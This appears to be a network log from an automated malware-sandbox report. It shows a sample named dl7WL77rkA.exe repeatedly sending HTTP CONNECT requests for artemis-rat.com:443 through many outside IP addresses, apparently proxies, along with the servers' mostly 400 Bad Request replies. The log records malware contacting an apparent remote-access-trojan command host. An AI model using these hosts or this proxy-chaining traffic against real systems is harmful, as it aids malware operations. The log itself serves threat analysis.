                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            183192.168.2.55035943.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.404417992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            184192.168.2.550386188.164.193.178112513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.406867027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.045452118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.920459032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702378988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            185192.168.2.550470104.16.230.163803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.409444094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.564297915 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            186192.168.2.550467172.64.207.185803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.410758972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.574661016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            187192.168.2.55047645.12.30.231803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.412154913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.566731930 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            188192.168.2.550361106.14.255.124803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.412293911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.742332935 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            189192.168.2.550443198.199.120.6580003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.415688992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            190192.168.2.55035783.243.92.15480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.416587114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.123603106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.123641014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            191192.168.2.550486185.162.231.254803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.420460939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.577233076 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            192192.168.2.550388136.243.82.12110823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.422524929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.830028057 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            193192.168.2.55032845.139.11.134803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.424078941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.811600924 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            194192.168.2.550394119.193.137.10431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.427164078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.076730013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.906594038 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            195192.168.2.549779194.163.159.93350813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.429287910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.514400005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.548244953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.608361959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.641196966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            196192.168.2.5497845.252.23.24931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.469378948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592494011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.593139887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592756987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.592715979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            197192.168.2.55034565.1.40.4710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.469382048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.854011059 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            198192.168.2.550423203.222.24.36803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.470297098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.107964993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.832882881 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            199192.168.2.550392201.238.248.13992293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.470441103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.420389891 CET161INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Proxy-Agent: Privoxy 3.0.21
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
